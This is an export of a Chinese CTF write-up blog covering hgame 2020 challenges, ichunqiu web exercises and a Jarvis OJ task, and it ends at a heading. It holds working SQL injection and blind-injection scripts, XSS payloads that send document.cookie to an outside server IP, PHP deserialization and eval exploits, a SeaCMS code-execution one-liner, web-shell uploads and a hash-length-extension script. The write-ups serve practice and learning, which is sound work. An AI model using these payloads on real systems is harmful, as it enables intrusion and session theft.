Cosmos的留言板-1sql注入,用/*1*/代替空格，双写select绕过,由于get方式，注意urlencode12345678910111213141516171819202122查库：id=-1%27%2f*1*%2funion%2f*1*%2fselselectect%2f*1*%2fdatabase()%3b%23回显:id:-1'/*1*/union/*1*/select/*1*/database();#easysql查表：id=-1%27union%2f*1*%2fselselectect%2f*1*%2fgroup_concat(table_name)%2f*1*%2ffrom%20%2f*1*%2finformation_schema.tables%2f*1*%2fwhere%2f*1*%2ftable_schema%3d0x6561737973716c%3b%23回显：id:-1'union/*1*/select/*1*/group_concat(table_name)/*1*/from/*1*/information_schema.tables/*1*/where/*1*/table_schema=0x6561737973716c;#f1aggggggggggggg,messages查段：-1%27%2f*1*%2funion%2f*1*%2fselselectect%2f*1*%2fgroup_concat(column_name)%2f*%201*%2ffrom%2f*1*%2finformation_schema.columns%2f*1*%2fwhere%2f*1*%2ftable_name%3d%20%27f1aggggggggggggg%27%2f*1*%2fand%2f*1*%2ftable_schema%3d%27easysql%27%3b%23回显：id:-1'/*1*/union/*1*/select/*1*/group_concat(column_name)/*1*/from/*1*/information_schema.columns/*1*/where/*1*/table_name='f1aggggggggggggg'/*1*/and/*1*/table_schema='easysql';#fl4444444ggetflag:id=-1%27%2f*1*%2funion%2f*1*%2fselselectect%2f*1*%2ffl4444444g%2f*1*%2ffrom%2f*1*%2ff1aggggggggggggg%3b%23回显：id:-1'/*1*/union/*1*/select/*1*/fl4444444g/*1*/from/*1*/f1aggggggggggggg;# Cosmos的新语言123456&lt;?phphighlight_file(__FILE__);$code = file_get_contents('mycode');eval($code);=tmA0ZGMlHmAzMQMzAwLmpwL6xmA1LwLyymZmVwM6pJZ 访问/mycode 12345678910111213function encrypt($str)&#123; $result = ''; for($i = 0; $i &amp;lt; strlen($str); $i++)&#123; $result .= chr(ord($str[$i]) + 1); &#125; return $result;&#125;echo(strrev(base64_encode(str_rot13(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(encrypt($_SERVER['token'])))))))))));if(@$_POST['token'] === $_SERVER['token'])&#123; echo($_SERVER['flag']);&#125; 这里有坑的是加密方式的顺序会变，大概5秒变一次，所以上脚本 1234567891011121314151617181920212223242526272829303132333435363738394041424344# -*- coding: utf-8 -*-import stringimport urllibimport requestsimport redef dec(s): result = '' for i in range(len(s)): result += chr(ord(s[i])-1) return resultdef rot13(s): return s.encode('rot13')def rev(s): return s[::-1]def b64(s): return s.decode('base64')s = requests.Session()url1 = 'http://e56bbf7d4b.php.hgame.n3ko.co'r = requests.get(url1)token = r.text.split('\n')[4]token = token[:-4]print tokenurl2 = url1 + '/mycode'r1 = requests.get(url2)method = r1.text.split('\n')[8]method = method[5:].split('(')for i in range(10): if method[i] == 'encrypt': token = dec(token) elif method[i] == 'strrev': token = rev(token) elif method[i] == 'base64_encode': token = b64(token) elif method[i] == 'str_rot13': token = rot13(token)print tokengetflag = s.post( url1, data = &#123;'token': token&#125; )print getflag.text 有时可能因为base64编码问题报错，尝试几次即可 Cosmos的聊天室 一道XSS题目,留言板过滤所有闭合的html标签即re.sub(“&lt;/?[^&gt;]+&gt;”, “”, message),之后又过滤了script、iframe并将消息全部大写 由于浏览器自动补全，所以我们可以不闭合右边，然后加注释，注释掉后面的\,编码绕过大写 最终payload 123&lt;svg/onload=&amp;#119&amp;#105&amp;#110&amp;#100&amp;#111&amp;#119&amp;#46&amp;#111&amp;#112&amp;#101&amp;#110&amp;#40&amp;#39&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#52&amp;#55&amp;#46&amp;#57&amp;#56&amp;#46&amp;#50&amp;#52&amp;#51&amp;#46&amp;#49&amp;#50&amp;#56&amp;#47&amp;#63&amp;#39&amp;#43&amp;#100&amp;#111&amp;#99&amp;#117&amp;#109&amp;#101&amp;#110&amp;#116&amp;#46&amp;#99&amp;#111&amp;#111&amp;#107&amp;#105&amp;#101&amp;#41&amp;#59&amp;#47&amp;#47编码内容为:window.open('http://vps-ip/?'+document.cookie);// 然后在自己服务器日志上找token miscCosmos的午餐 解压附件得到Capture.pcapng和ssl_log.log 注意到流量包里有许多https/TLS协议的包，不难发现应该是解密流量解密SSL参考 值得注意的是最新版wireshark已经 ssl 改为 tls，其实ssl/tls都已统称通信加密协议，所以就放一块了 把ssl_log.log导入后发现多了许多包，追踪tls流，发现有一个zip压缩包，保存原始数据导出来解压得到Outguess with key.jpg 根据图片名字可知要使用outguess这个工具进行提取数据，然而这个工具需要密码，我们从图片的备注找到密码隐写工具outguess安装使用介绍 1outguess -r -k gUNrbbdR9XhRBDGpzz "Outguess with key.jpg" out.txt 得到out.txt 1https://dwz.cn/69rOREdu 访问下载zip解压得到一个二维码，扫码识别即可 地球上最后的夜晚 解压得到一个No password.pdf和.7z压缩包(有密码)，估计密码藏在pdf中，通常pdf隐写和工具wbStego4open相关,而且No password 使用工具decode得到密码 Zip Password: OmR#O12#b3b%s*IW 解压得到.doc文件,发现里面并没有隐藏文字，改后缀为zip，最终在secret.xml中找到flag 所见即为假 题目给了.zip，一开始其实考的是伪加密，不过360压缩直接判断无密码并看到附加信息 F5 key: NllD7CQon6dBsFLr 直接解压得到FLAG_IN_PICTURE.jpg 所以应该是F5隐写 12git clone https://github.com/matthewgao/F5-steganography.gitjava Extract -p NllD7CQon6dBsFLr -e out.txt FLAG_IN_PICTURE.jpg 得到一个out.txt，内容如下 1526172211A0701003392B5E50A01050600050101808000B9527AEA2402030BA70004A70020CB5BD C2D80000008666C61672E7478740A03029A9D6C65DFCED5016867616D657B343038375E7A236D73 7733344552746E46557971704B556B32646D4C505736307D1D77565103050400 明显的rar头，winhex导入十六进制数得到文件，解压得flag 玩玩条码 解压得到7zipPasswordHere.mp4、Code128.7z和JPNPostCode.png，并自带压缩包备注如下 Decode JPNPostCode to get MSUStegoVideo password. 而JPNPostCode意为日本邮政条码,通过比对和解码得到1087627 进而使用VirtualDub2引入插件MSUStegoVideo，得到.7z密码，具体过程如下 1231. msu_stegovideo.zip解压到/VirtualDub2_44065/plugins322. 打开VirtualDub.exe，Video-&gt;Filters-&gt;add-&gt;MSU StegoVideo1.0-&gt;OK-&gt;Extract file from video-&gt;输入条码信息-&gt;OK3. 然后打开mp4播放一小段就出来一个txt文件 打开txt得到7z密码 Zip Password: b8FFQcXsupwOzCe@ 解压7z获得code128.png,解码得flag Week-3web序列之争 - Ordinal Scale1只有达到第一名才能拿到 flag！ 点击进去后，数字名字就可以挑战，不断挑战经验越来越高，而且都是挑战成功，但最高只有第二名，得想办法拿到第一名 F12看到注释source.zip,看来需要审计了 game.php 12345&lt;?php if($game-&gt;rank-&gt;Get() === 1)&#123;?&gt; &lt;h2&gt;hgame&#123;flag_is_here&#125;&lt;/h2&gt; &lt;?php &#125;?&gt; 也就是第一名才能getflag,跟进Get() 12345678910111213141516public function __construct()&#123; if(!isset($_SESSION['rank']))&#123; $this-&gt;Set(rand(2, 1000)); return; &#125;$this-&gt;Set($_SESSION['rank']);&#125;public function Set($no)&#123; $this-&gt;rank = $no;&#125;public function Get()&#123; return $this-&gt;rank;&#125; 也就是说$rank从Session中获取，我们需要修改Session方法，同时根据题目的序列之争，这道题应该通过反序列化修改Session 123456789101112131415161718192021222324public function __construct($key)&#123; $this-&gt;encryptKey = $key; if(!isset($_COOKIE['monster']))&#123; $this-&gt;Set(); return; &#125; $monsterData = base64_decode($_COOKIE['monster']); if(strlen($monsterData) &gt; 32)&#123; $sign = substr($monsterData, -32); $monsterData = substr($monsterData, 0, strlen($monsterData) - 32); if(md5($monsterData . $this-&gt;encryptKey) === $sign)&#123; $this-&gt;monsterData = unserialize($monsterData); &#125;else&#123; session_start(); session_destroy(); setcookie('monster', ''); header('Location: index.php'); exit; &#125; &#125; $this-&gt;Set(); &#125; 想要伪造sign需要知道encryptKey，而encryptKey在game类的sign属性中 1234567891011121314151617181920212223242526class Game&#123; private $encryptKey = 'SUPER_SECRET_KEY_YOU_WILL_NEVER_KNOW'; public $welcomeMsg = '%s, Welcome to Ordinal Scale!'; private $sign = ''; public $rank; public function __construct($playerName)&#123; $_SESSION['player'] = $playerName; if(!isset($_SESSION['exp']))&#123; $_SESSION['exp'] = 0; &#125; $data = [$playerName, $this-&gt;encryptKey]; $this-&gt;init($data); $this-&gt;monster = new Monster($this-&gt;sign); $this-&gt;rank = new Rank(); &#125; private function init($data)&#123; foreach($data as $key =&gt; $value)&#123; $this-&gt;welcomeMsg = sprintf($this-&gt;welcomeMsg, $value); $this-&gt;sign .= md5($this-&gt;sign . $value); &#125; &#125;&#125; 分析一下init()方法，输入参数$data中有[$playerName, $this-&gt;encryptKey]，而welcomeMsg生成使用了sprintf函数，在第一个循环内，第二个循环的$value即为encryptKey，而sprintf存在格式化字符串漏洞，用%s作为名字可以被第二轮循环中%s的值被替换成 encryptKey,故得到 1gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL 接下来就可以伪造$sign了,考虑到Rank类 1234567891011121314public function __destruct()&#123; // 确保程序是跑在服务器上的！ $this-&gt;serverKey = $_SERVER['key']; if($this-&gt;key === $this-&gt;serverKey)&#123; $_SESSION['rank'] = $this-&gt;rank; &#125;else&#123; // 非正常访问 session_start(); session_destroy(); setcookie('monster', ''); header('Location: index.php'); exit; &#125; &#125; 其中在设置Session时会对比key和serverkey，而serverkey是服务器环境变量我们无法得知，但可以使用 $this-&gt;key = &amp;$this-&gt;serverKey exp如下 12345678910111213141516171819&lt;?php class Rank &#123; private $rank = 1; private $serverKey; private $key; public function __construct()&#123; $this-&gt;key = &amp;$this-&gt;serverKey; &#125; &#125;$data = ['name', 'gkUFUa7GfPQui3DGUTHX6XIUS3ZAmClL']; $sign = ''; foreach($data as $value)&#123; $sign .= md5($sign . $value); &#125; $rank = serialize(new Rank()); echo(base64_encode($rank . md5($rank . $sign)));输出:Tzo0OiJSYW5rIjozOntzOjEwOiIAUmFuawByYW5rIjtpOjE7czoxNToiAFJhbmsAc2VydmVyS2V5IjtOO3M6OToiAFJhbmsAa2V5IjtSOjM7fTE3NTJlMTkyNTljM2ZmOTY2ZWRmMGQzZTUxODk4Zjgz 使用名字name，替换monstercookie即可getflag 不设置$key好像也行，因为反序列化时会取Rank类默认值 Cosmos的聊天室2.0 题目比1.0过滤更简单，只将script置换为空，双写绕过即可 1&lt;scripscriptt&gt;alert(1)&lt;/scripscriptt&gt; 然而发现没有弹框,并报错 1Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-bhHHL3z2vDgxUt0W3dWQOrprscmda2Y5pLsLg4GF+pI='), or a nonce ('nonce-...') is required to enable inline execution. 说明被CSP策略阻拦了,它限制了内联JS脚本，并且限制了引用的静态资源文件只能从同域中下载。 这种情况一般找上传点，上传alert(‘hack’)的图片再引用；但这题没有上传点，确有一个/send接口。直接访问返回的是当前token，我们可以向它传参当作JS引入 1&lt;scriscriptpt src="/send?message=alert('hack')"&gt;&lt;/scscriptript&gt; 发现弹框，vps接收(注意+号urlencode为%2B) 1&lt;scriscriptpt src="/send?message=window.open('http://47.98.243.128/?'%2Bdocument.cookie)"&gt;&lt;/scscriptript&gt; misc美 人 鲸题目链接 题目给出一个docker镜像,拉下来 1docker pull zhouweitong/hgame2020-misc:week 启动 1docker run --name=misc1 zhouweitong/hgame2020-misc:week3 没发现什么现象,查看端口发现另一个端口开放,重新构建容器，映射端口 1docker rm misc1 docker run --name=misc1 -p 8000:80 zhouweitong/hgame2020-misc:week3 访问localhost:8000得到提示 1You want flag? See$FLAG. 进入容器输入命令 12docker exec -it shecho $FLAG 得到Find flag.tar.gz,输入如下命令寻找 1find / -name flag.tar.gz 得到/user/share/man/man8/flag.tar.gz，进入路径解压 1tar -xzvf flag.tar.gz 得到flag.zip和README 1cat README 得到See sh histroy,命令行输入history得到 10 echo -e "Zip password is somewhere else in /etc.\n Find it!" 利用grep寻找文件 1grep -rn "Zip" /etc 得到/etc/issue:4:Zip Password ** 得到了zip密码那就解压flag.zip 这里我就把flag.zip从容器提取出来 1docker cp misc1:/usr/share/man/man8/flag.zip . 解压得到flag.db,是sqlite数据库文件 直接记事本打开文件就能看到flag 总结 前三周还好能打打，week4实在打不动了，看看wp继续学习吧]]></content>
      <categories>
        <category>CTFWP</category>
      </categories>
      <tags>
        <tag>CTF</tag>
        <tag>Misc</tag>
        <tag>Web</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[ichunqiu-web学习]]></title>
    <url>%2F2019%2F11%2F18%2Fichunqiu-web%E5%AD%A6%E4%B9%A0%2F</url>
    <content type="text"><![CDATA[sql 出题人就告诉你这是个注入，有种别走！ 一波测试发现select、order等关键字被过滤了,但是可以用&lt;&gt;绕过 1 or&lt;&gt;der by 4后发现无回显，即三个字段 123456id=-1 union sele&lt;&gt;ct 1,database(),2#sqliid=-1 union sele&lt;&gt;ct 1,group_concat(table_name),2 from information_schema.tables where table_schema=database()#info,usersid=-1 union sele&lt;&gt;ct 1,group_concat(column_name),2 from information_schema.columns where table_schema=database()#id,title,flAg_T5ZNdrm,id,username,flag_9c861b688330 找flag时耗了点时间，后来发现真正的flag在info表，字段是flAg_T5ZNdrm 12id=-1 union sele&lt;&gt;ct 1,group_concat(flAg_T5ZNdrm),2 from info#flag&#123;4d9fe649-b59c-4def-825a-52b452af4e4c&#125;,test include 没错！就是文件包含漏洞。 1234567&lt;?php show_source(__FILE__);if(isset($_REQUEST['path']))&#123; include($_REQUEST['path']);&#125;else&#123; include('phpinfo.php');&#125; 发现allow_url_include是打开的 可以使用php://input协议，使用post传递参数&lt;?php system(“ls”);?&gt; dle345aae.php index.php phpinfo.php php://filter/read=convert.base64-encode/resource=dle345aae.php12PD9waHAgCiRmbGFnPSJmbGFne2U1ZDBiZTA0LWIzYzAtNGI0YS1iYjJjLTA3MGIwYWM5MzNkYX0iOwo=#&lt;?php \n$flag="flag&#123;e5d0be04-b3c0-4b4a-bb2c-070b0ac933da&#125;";\n who are you?12http://106.75.72.168:2222/我是谁，我在哪，我要做什么？ 进来看到Sorry. You have no permissions.抓包发现cookie:role=Zjo1OiJ0aHJmZyI7 123456base64-&gt;f:5:"thrfg";rot13-&gt;f:5:"guest";base64-&gt;Zjo1OiJucXp2YSI7&lt;body&gt;&lt;!-- $filename = $_POST['filename']; $data = $_POST['data']; --&gt;Hello admin, now you can upload something you are easy to forget.&lt;/body&gt; filename=1.php&amp;data=&lt;?php echo phpinfo(); ?&gt; No No No! 看来有waf,传个数组试试? filename=1.php&amp;data[]=&lt;?php phpinfo(); ?&gt; 成功了(要知道php的函数一般都无法执行数组的) your file is in ./uploads/46451b0499c0df2ded46751ee23b93341.php 访问得flag flag{e07cd440-8eed-11e7-997d-7efc09eb6c59} SQLi-50 后台有获取flag的线索 进来看源码 1&lt;!-- login.php?id=1 --&gt; 进入login.php尝试很多都没发现注入点，后来发现这是假的得东西 访问index.php发现有个重定向 12location: ./b68a89d1c4a097a9d8631b3ac45e8979.phppage: l0gin.php?id=1 所以真正注入的页面在这l0gin.php id=-1 union select user(),database()# id username -1 union select user() 发现逗号和往后的被过滤了，看这里SQL注入–显注和盲注中过滤逗号绕过1234567891011id=-1' union select * from (select user()) a join (select database()) b%23回显：test_user@localhost sqliid=-1' union select * from (select user()) a join (select group_concat(table_name) from information_schema.tables where table_schema=database()) b%23回显：test_user@localhost usersid=-1' union select * from (select user()) a join (select group_concat(column_name) from information_schema.columns where table_schema=database()) b%23回显：test_user@localhost id,username,flag_9c861b688330id=-1' union select * from (select user()) a join (select group_concat(flag_9c861b688330) from users) b%23回显：flag&#123;15de1673-7833-4c4d-8ad3-c35d853daa90&#125;,test SQLi-2001234find the flag.flag格式为flag&#123;xxxxx&#125;提交答案请参考该格式 进来是一个登陆框，一般这种是username存在注入,用burpsuite测试一波 最终发现payload含%时会报错 1234&lt;br /&gt;&lt;b&gt;Warning&lt;/b&gt;: sprintf(): Too few arguments in &lt;b&gt;/var/www/html/index.php&lt;/b&gt; on line &lt;b&gt;18&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Warning&lt;/b&gt;: mysqli::query(): Empty query in &lt;b&gt;/var/www/html/index.php&lt;/b&gt; on line &lt;b&gt;19&lt;/b&gt;&lt;br /&gt; 至于绕过看这深入解析sprintf格式化字符串漏洞 进行如下尝试 1234admin %1$\' or 1=1#回显：password error!admin %1$\' or 1=2#回显：username error! 可以进行盲注,上exp 1234567891011121314151617181920212223242526272829# -*- coding:utf-8 -*-import requestsurl = "http://7e1dc43433104d0b91b601094f67e2ce93c54c32fc344816.changame.ichunqiu.com/"result = ""session = requests.Session()for x in range(1, 50): high = 127 low = 32 mid = (low + high) // 2 while high &gt; low: #payload = "admin %1$\' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),&#123;&#125;,1))&gt;&#123;&#125;#".format(x,mid) #flag #payload = "admin %1$\' and ascii(substr((select column_name from information_schema.columns where table_schema=database() limit 0,1),&#123;&#125;,1))&gt;&#123;&#125;#".format(x,mid) #flag payload = "admin %1$\' and ascii(substr((select flag from flag limit 0,1),&#123;&#125;,1))&gt;&#123;&#125;#".format(x,mid) #flag&#123;b5b36121-86dd-a4db-aab3-86ddb749dfa1&#125; data = &#123;'username': payload, 'password': 'admin' &#125; #print data response = requests.post(url=url, data=data, timeout=10) #print response.content if 'password error!' in response.content: low = mid + 1 else: high = mid mid = (low + high) // 2 result += chr(int(mid)) print result broken123http://106.75.72.168:1111/you got a file, but ... 拿到一大串JSFUCK代码，直接丢控制台无法解码 前面第一个字符后加],最后一对()去掉1234ƒ anonymous() &#123;var flag="flag&#123;f_f_l_u_a_c_g_k&#125;";alert('flag is not here');&#125; Do you know upload？ 加油吧，少年。 burp抓包改Content-Type: image/jpeg和后缀php 1Upload: 123.php&lt;br /&gt;Type: image/jpeg&lt;br /&gt;Size: 0.0283203125 Kb&lt;br /&gt;Stored in: upload/123.php 菜刀连上没找到flag,看config.php 123456789101112&lt;?phperror_reporting(0);session_start();$servername = "localhost";$username = "ctf";$password = "ctfctfctf";$database = "ctf";// 创建连接$conn = mysql_connect($servername,$username,$password) or die(" connect to mysql error");mysql_select_db($database);?&gt; 菜刀连数据库找flag 1234&lt;T&gt;MYSQL&lt;/T&gt;&lt;H&gt;localhost&lt;/H&gt;&lt;U&gt;ctf&lt;/U&gt;&lt;P&gt;ctfctfctf&lt;/P&gt; 发现连不上，传大马连 flag{663c8d28-4a17-42d1-b2d6-c7c293c58c94} Login 加油，我看好你 看源码发现test1 test1 登陆成功，发现没东西 抓包登陆改show=1 123456789101112131415161718192021222324252627282930313233343536373839&lt;!-- &lt;?php include 'common.php'; $requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE); class db &#123; public $where; function __wakeup() &#123; if(!empty($this-&gt;where)) &#123; $this-&gt;select($this-&gt;where); &#125; &#125; function select($where) &#123; $sql = mysql_query('select * from user where '.$where); return @mysql_fetch_array($sql); &#125; &#125; if(isset($requset['token'])) &#123; $login = unserialize(gzuncompress(base64_decode($requset['token']))); $db = new db(); $row = $db-&gt;select('user=\''.mysql_real_escape_string($login['user']).'\''); if($login['user'] === 'ichunqiu') &#123; echo $flag; &#125;else if($row['pass'] !== $login['pass'])&#123; echo 'unserialize injection!!'; &#125;else&#123; echo "(鈺�碘枴鈥�)鈺傅鈹粹攢鈹� "; &#125; &#125;else&#123; header('Location: index.php?error=1'); &#125;?&gt; --&gt; 得知要得到flag需要满足 $login[‘user’] === ‘ichunqiu’ 12345$zzzz = array('user' =&gt; 'ichunqiu' );$zzzz = base64_encode(gzcompress(serialize($zzzz)));echo $zzzz;# eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA== 添加token flag{7ac94bdb-28be-48d2-a66c-45dcbbe8b277} hash 这只是第一步，然后呢？ 进来点击跳转到/index.php?key=123&amp;hash=f9109d5f83921a551cf859f853afe7bb 1you are 123;if you are not 123,you can get the flag&lt;br&gt;&lt;!--$hash=md5($sign.$key);the length of $sign is 8 f9109d5f83921a551cf859f853afe7bb解密得到kkkkkk01123,取其前8位就是kkkkkk01,构造如下key=000,md5(是kkkkkk01000) 1key=000&amp;hash=62f31428f8199e34d987a423e1fe17e8 得到next step is Gu3ss_m3_h2h2.php，访问 1234567891011121314151617181920212223242526272829303132&lt;?php class Demo &#123; private $file = 'Gu3ss_m3_h2h2.php'; public function __construct($file) &#123; $this-&gt;file = $file; &#125; function __destruct() &#123; echo @highlight_file($this-&gt;file, true); &#125; function __wakeup() &#123; if ($this-&gt;file != 'Gu3ss_m3_h2h2.php') &#123; //the secret is in the f15g_1s_here.php $this-&gt;file = 'Gu3ss_m3_h2h2.php'; &#125; &#125; &#125; if (isset($_GET['var'])) &#123; $var = base64_decode($_GET['var']); if (preg_match('/[oc]:\d+:/i', $var)) &#123; die('stop hacking!'); &#125; else &#123; @unserialize($var); &#125; &#125; else &#123; highlight_file("Gu3ss_m3_h2h2.php"); &#125; ?&gt; 绕过正则和_wakeup(),参考 1234567891011121314151617181920212223242526&lt;?phpclass Demo &#123; private $file = 'Gu3ss_m3_h2h2.php'; public function __construct($file) &#123; $this-&gt;file = $file; &#125; function __destruct() &#123; echo @highlight_file($this-&gt;file, true); &#125; function __wakeup() &#123; if ($this-&gt;file != 'Gu3ss_m3_h2h2.php') &#123; //the secret is in the f15g_1s_here.php $this-&gt;file = 'Gu3ss_m3_h2h2.php'; &#125; &#125;&#125;$a = new Demo('f15g_1s_here.php');$s = serialize($a);echo $s;echo '&lt;br&gt;';$s = str_replace('O:4', 'O:+4',$s);//绕过正则$s = str_replace(':1:', ':2:' ,$s);//绕过wakeup函数echo base64_encode($s);//最后base64编码?&gt;# TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ== 访问/Gu3ss_m3_h2h2.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ== 123456789&lt;?php if (isset($_GET['val'])) &#123; $val = $_GET['val']; eval('$value="' . addslashes($val) . '";'); &#125; else &#123; die('hahaha!'); &#125; ?&gt; val=${eval($_GET[a])}&amp;a=echo%20`ls`;ThinkPHP框架任意代码执行漏洞的利用 1Gu3ss_m3_h2h2.php True_F1ag_i3_Here_233.php f15g_1s_here.php index.php val=${eval($_GET[a])}&amp;a=echo%20`cat%20True_F1ag_i3_Here_233.php`; 123&lt;?php$flag = 'flag&#123;29743eee-3e44-408f-ad70-c9638ec3a2dc&#125;';?&gt; Test 善于查资料，你就可以拿一血了。 直接看这个海洋cms前台任意代码执行 /search.php?searchtype=5&amp;tid=0&amp;year=23334444);phpinfo();//成功执行 /search.php?searchtype=5&amp;tid=0&amp;year=23334444);assert($_POST[1]);//一句话链接 找到数据库信息/var/www/html/data/common.inc.php 123456789&lt;?php//数据库连接信息$cfg_dbhost = '127.0.0.1';$cfg_dbname = 'seacms';$cfg_dbuser = 'sea_user';$cfg_dbpwd = '46e06533407e';$cfg_dbprefix = 'sea_';$cfg_db_language = 'utf8';?&gt; SELECT `flag` FROM `flag_140ad2e0d8cb` flag{0b6238f2-2960-4364-8cec-86b3f89c3586} 123 12341234，然后就解开了 主页是登录框,看下源码 12&lt;!-- 用户信息都在user.php里 --&gt;&lt;!-- 用户默认默认密码为用户名+出生日期 例如:zhangwei1999 --&gt; 访问user.php页面为空，访问user.php.bak发现泄露 burpsuite进行爆破，最后得到 username=lixiuyun&amp;password=lixiuyun1990 成功登陆，但发现是空白页 12345&lt;!-- 存在漏洞需要去掉 --&gt;&lt;!-- &lt;form action="" method="POST" enctype="multipart/form-data"&gt; &lt;input type="file" name="file" /&gt; &lt;input type="submit" name="submit" value="上传" /&gt;&lt;/form&gt; --&gt; 审查元素去掉注释 php2, php3, php4, php5, phps, pht, phtm, phtml 均试下。 123.png.phtml绕过 1&lt;a href="/view.php"&gt;view&lt;/a&gt; 进去提示file?尝试/view.php?file=flag.php filter “flag” 被过滤了，双写绕过/view.php?file=fflaglag flag{42e5f4e8-ed11-4358-891f-10b4e37f719b} phone number12http://106.75.72.168:3333Phone number is a good thing. 注册接口发现手机可以传入十六进制表示的数据,这里存在二次注入，即我们构造恶意十六进制，然后登陆时check可以查看数据库信息 因为查询接口是数字型查询，并没有使用单引号，直接1 union即可 以下是通过注册时更改手机号来进行注入,用户密码自己决定 1234561 union select database() #0x3120756e696f6e2073656c6563742064617461626173652829回显：webdb1 union select group_concat(table_name) from information_schema.tables where table_schema=database() #0x3120756e696f6e2073656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d64617461626173652829回显：user1 union select group_concat(column_name) from information_schema.columns where table_schema=database() #0x3120756e696f6e2073656c6563742067726f75705f636f6e63617428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d64617461626173652829回显：id,username,phone,password 这里要注意一点，check的时候别忘了看源码 1&lt;!-- 听说admin的电话藏着大秘密哦～--&gt; 所以我们直接查admin的密码即可,然而一直返回db error!,其实是phone 121 union select phone from user #0x3120756e696f6e2073656c6563742070686f6e652066726f6d2075736572回显：flag&#123;6dd303b0-8fce-2396-9ad8-d9f7a72f84b0&#125; ps:返回的信息很多，Ctrl+F找flag试一下]]></content>
      <categories>
        <category>平台训练</category>
      </categories>
      <tags>
        <tag>Web</tag>
        <tag>SQL</tag>
        <tag>php</tag>
        <tag>审计</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[Jarvis OJ(二)]]></title>
    <url>%2F2019%2F09%2F27%2FJarvis-OJ-%E4%BA%8C%2F</url>
    <content type="text"><![CDATA[flag在管理员手里题目链接：http://web.jarvisoj.com:32778/ 只有管理员才能获得flag，你能想办法获得吗？ 进去现实Only Admin can see the flag!! 抓包发现 12Cookie: role=s%3A5%3A%22guest%22%3B;hsh=3a4727d57463f122833d9e732f94e4e0 其中role=s:5:”guest”,改为Admin后 12&lt;b&gt;Notice&lt;/b&gt;: unserialize(): Error at offset 11 of 11 bytes in &lt;b&gt;/opt/lampp/htdocs/index.php&lt;/b&gt; on line &lt;b&gt;19&lt;/b&gt;&lt;br /&gt;&lt;h3&gt;Only Admin can see the flag!!&lt;/h3&gt; 是一个反序列化的报错,估计跟hsh有关，要怎么找呢？ “/index.php~”发现源码泄露,打开乱码,这其实是index.php的备份恢复文件，修改文件名为.index.php.swp，输入命令vim -r index.php得到恢复后的index.php。 12345678910111213141516171819202122232425262728293031323334353637383940&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Web 350&lt;/title&gt;&lt;style type="text/css"&gt; body &#123; background:gray; text-align:center; &#125;&lt;/style&gt;&lt;/head&gt;&lt;body&gt; &lt;?php $auth = false; $role = "guest"; $salt = if (isset($_COOKIE["role"])) &#123; $role = unserialize($_COOKIE["role"]); $hsh = $_COOKIE["hsh"]; if ($role==="admin" &amp;&amp; $hsh === md5($salt.strrev($_COOKIE["role"]))) &#123; $auth = true; &#125; else &#123; $auth = false; &#125; &#125; else &#123; $s = serialize($role); setcookie('role',$s); $hsh = md5($salt.strrev($s)); setcookie('hsh',$hsh); &#125; if ($auth) &#123; echo "&lt;h3&gt;Welcome Admin. Your flag is &#125; else &#123; echo "&lt;h3&gt;Only Admin can see the flag!!&lt;/h3&gt;"; &#125; ?&gt;&lt;/body&gt;&lt;/html&gt; 典型的hash拓展长度攻击，但这里不知道salt的长度，需要爆破 12345678910111213141516171819202122232425import hashpumpyimport urllibimport requestsfor i in range(1,30): m=hashpumpy.hashpump('3a4727d57463f122833d9e732f94e4e0',';\"tseug\":5:s',';\"nimda\":5:s',i) print i url='http://web.jarvisoj.com:32778/' digest=m[0] message=urllib.quote(urllib.unquote(m[1])[::-1]) cookie='role='+message+'; hsh='+digest #print cookie headers=&#123; 'cookie': cookie, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': ':zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate'&#125; print headers re=requests.get(url=url,headers=headers) print re.text if "Welcome" in re.text: print re; exit() 最终得到salt长度为12 12345678910111213141516171812&#123;'Accept-Language': ':zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'cookie': 'role=s%3A5%3A%22admin%22%3B%00%00%00%00%00%00%00%C0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80s%3A5%3A%22guest%22%3B; hsh=fcdc3840332555511c4e4323f6decb07', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'&#125;&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Web 350&lt;/title&gt;&lt;style type="text/css"&gt; body &#123; background:gray; text-align:center; &#125;&lt;/style&gt;&lt;/head&gt;&lt;body&gt; &lt;h3&gt;Welcome Admin. Your flag is PCTF&#123;H45h_ext3ndeR_i5_easy_to_us3&#125; &lt;/h3&gt; &lt;/body&gt;&lt;/html&gt; Chopper关卡入口：http://web.jarvisoj.com:32782/ 